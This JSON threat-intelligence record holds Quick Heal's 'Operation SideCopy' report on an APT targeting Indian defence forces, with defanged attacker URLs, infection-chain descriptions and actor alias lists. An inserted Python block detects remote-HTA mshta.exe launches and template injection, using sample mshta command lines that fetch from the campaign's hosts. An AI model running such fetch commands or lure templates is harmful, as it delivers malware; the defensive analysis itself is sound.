{
	"id": "2e4ac937-a6a5-4158-a63e-fc1779dff5b9",
	"created_at": "2026-04-06T00:21:02.003123Z",
	"updated_at": "2026-04-10T13:11:46.742543Z",
	"deleted_at": null,
	"sha1_hash": "4003f82d709155be4c5af42b8386846aca091747",
	"title": "Operation SideCopy!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 818248,
	"plain_text": "Operation SideCopy!\r\nBy Kalpesh Mantri\r\nPublished: 2020-09-23 · Archived: 2026-04-05 12:37:23 UTC\r\n23 September 2020\r\nAn insight into a Transparent Tribe sub-division that has been incorrectly attributed for years.\r\nIntroduction\r\nQuick Heal’s threat intelligence team recently uncovered evidence of an advanced persistent threat (APT) against Indian defence forces. Our analysis shows that many older campaigns and attacks from the past year relate to ‘Operation SideCopy’ through common IOCs.\r\nKey Findings\r\nOperation SideCopy has been active from early 2019 to date.\r\nThis cyber-operation has targeted only Indian defence forces and armed forces personnel.\r\nThe malware modules seen are constantly under development; updated modules are released after reconnaissance of victim data.\r\nThe actors keep track of malware detections and update modules when they are detected by AV.\r\nAlmost all C2 servers are hosted with Contabo GmbH, and the server names are similar to machine names found in the Transparent Tribe report.\r\nThis threat actor misleads the security community by copying TTPs that point at the SideWinder APT group.\r\nWe suspect this threat actor has links with the Transparent Tribe APT group.\r\nhttps://www.seqrite.com/blog/operation-sidecopy/\r\nPage 1 of 5\r\n\r\nSummary:\r\nA few months ago, Quick Heal’s Next-Gen Behavioural Detection system alerted on a few processes executing HTA files fetched from non-reputed websites.\r\nWe compiled a list of the URLs contacted by mshta.exe across multiple customers:\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Armed-Forces-Spl-Allowance-Order/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Defence-Production-Policy-2020/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Images/8534\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/IncidentReport/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/ParaMil-Forces-Spl-Allowance-Order/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Req-Data/html\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Sheet_Roll/html\r\nhxxps://demo[.]smart-school[.]in/uploads/staff_documents/9/Sheet_Roll/html\r\nhxxps://demo[.]smart-school[.]in/uploads/student_documents/12/css/\r\nhxxps://drivetoshare[.]com/mod[.]gov[.]in_dod_sites_default_files_Revisedrates/html\r\nSeveral of these URLs (highlighted in the original post) were sent to targets across Indian defence units and to individual armed forces personnel.\r\nWe started tracking this campaign because it was targeting critical Indian organizations.\r\nTraces of this operation can be tracked from early 2019 to date. So far we have observed three infection chains.\r\nIn two of the chains the initial infection vector was an LNK file delivered by malspam. In the third, the attackers used a template injection attack together with the Equation Editor vulnerability (CVE-2017-11882) as the initial infection vector. 
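The two detection points above, as an added example that is not part of the original post: hunting process-creation telemetry for mshta.exe launches that fetch an HTA from a remote host (with the URLs defanged in the style the post uses for its IOCs), and checking a Word document for the external attachedTemplate relationship that a template injection lure relies on. The event records and the .docx are constructed sample data; the hosts in the events mirror those listed above, while the field names, parent processes and the template URL are assumptions. Python, standard library only.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Part 1: hunt for mshta.exe pulling an HTA from a remote host.
# Constructed Sysmon-style process-creation records (sample data, not real telemetry).
# The hosts mirror the infrastructure listed in the post; the other fields are assumed.
SAMPLE_EVENTS = [
    {'parent': 'explorer.exe', 'image': 'mshta.exe',
     'cmd': 'mshta.exe https://demo.smart-hospital.in/uploads/staff_documents/19/Req-Data/html'},
    {'parent': 'winword.exe', 'image': 'mshta.exe',
     'cmd': 'mshta.exe https://drivetoshare.com/mod.gov.in_dod_sites_default_files_Revisedrates/html'},
    {'parent': 'svchost.exe', 'image': 'mshta.exe',
     'cmd': 'mshta.exe C:/ProgramData/Vendor/setup.hta'},  # local HTA, not a remote fetch
    {'parent': 'explorer.exe', 'image': 'notepad.exe', 'cmd': 'notepad.exe notes.txt'},
]

def defang(url):
    '''Rewrite a URL the way the post does (hxxps, [.]) so it cannot be clicked by accident.'''
    scheme, rest = url.split('://', 1) if '://' in url else ('', url)
    host, sep, path = rest.partition('/')
    out = host.replace('.', '[.]') + sep + path
    if scheme:
        out = scheme.replace('http', 'hxxp') + '://' + out
    return out

def refang(url):
    '''Inverse of defang, for feeding an IOC back into a lookup.'''
    return url.replace('hxxp', 'http').replace('[.]', '.')

def find_remote_hta(events):
    '''Return (host, defanged_url, parent_image) for each mshta.exe launch with a URL argument.
    A local .hta path is not reported: mshta running a remote document is the strong signal.'''
    hits = []
    for ev in events:
        if ev['image'].lower() != 'mshta.exe':
            continue
        for token in ev['cmd'].split()[1:]:
            parts = urlsplit(token)
            if parts.scheme in ('http', 'https') and parts.netloc:
                hits.append((parts.netloc.lower(), defang(token), ev['parent']))
    return hits

# Part 2: spot a remote template in a .docx (the relationship template injection relies on).
REL_NS = 'http://schemas.openxmlformats.org/package/2006/relationships'
ATTACHED_TEMPLATE = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate'

def build_docx(template_target=None):
    '''Build a minimal .docx in memory (sample data). With template_target set, the package
    carries an external attachedTemplate relationship, which makes Word fetch that URL on open.'''
    rels = ET.Element('{%s}Relationships' % REL_NS)
    if template_target:
        ET.SubElement(rels, '{%s}Relationship' % REL_NS, Id='rId1', Type=ATTACHED_TEMPLATE,
                      Target=template_target, TargetMode='External')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('[Content_Types].xml', '<Types/>')
        z.writestr('word/document.xml', '<document/>')
        z.writestr('word/_rels/settings.xml.rels', ET.tostring(rels))
    return buf.getvalue()

def remote_templates(docx_bytes):
    '''Return the external targets of every attachedTemplate relationship in the package.'''
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith('word/_rels/') and name.endswith('.rels')):
                continue
            for rel in ET.fromstring(z.read(name)).iter('{%s}Relationship' % REL_NS):
                if rel.get('Type') == ATTACHED_TEMPLATE and rel.get('TargetMode') == 'External':
                    found.append(rel.get('Target'))
    return found

if __name__ == '__main__':
    for host, url, parent in find_remote_hta(SAMPLE_EVENTS):
        print('remote HTA via mshta.exe:', host, url, 'parent=' + parent)
    # assumed template URL, named after one of the lure documents listed in the post
    lure = build_docx('https://template-host.invalid/Defence-Production-Policy-2020.dotm')
    print('remote templates in constructed lure:', remote_templates(lure))
    print('remote templates in clean document:', remote_templates(build_docx()))
```

In practice the records passed to find_remote_hta come from Sysmon Event ID 1 or Windows 4688 data mapped to the same three keys; the parent image is kept in the result because explorer.exe (an LNK double-click) and winword.exe (an Office lure) are the parents that match the chains described here. The docx check reads only the .rels parts, so it runs safely on a file pulled from a mailbox without opening it in Word.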
Though the initial infection vector differs in the third case, the final payload is similar to that of the first two chains.\r\nThe images below (figures in the original post) give an overview of the malware infection on victim machines.\r\nInfection Chain – Version 1 (figure in the original post)\r\nInfection Chain – Version 2 (figure in the original post)\r\nInfection Chain – Version 3 (figure in the original post)\r\nWe have provided an in-depth analysis of each of these modules in our latest report (linked from the original post).\r\nThe background and analysis in that paper give complete forensic details of our current thinking on the use of malware in this operation, together with all the factors that led to our attribution.\r\nSubject matter experts:\r\nKalpesh Mantri, Principal Security Researcher\r\nPawan Chaudhari, Threat Research Scientist\r\nGoutam Tripathy, Senior Security Researcher\r\nSource: https://www.seqrite.com/blog/operation-sidecopy/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.seqrite.com/blog/operation-sidecopy/"
	],
	"report_names": [
		"operation-sidecopy"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434862,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4003f82d709155be4c5af42b8386846aca091747.pdf",
		"text": "https://archive.orkl.eu/4003f82d709155be4c5af42b8386846aca091747.txt",
		"img": "https://archive.orkl.eu/4003f82d709155be4c5af42b8386846aca091747.jpg"
	}
}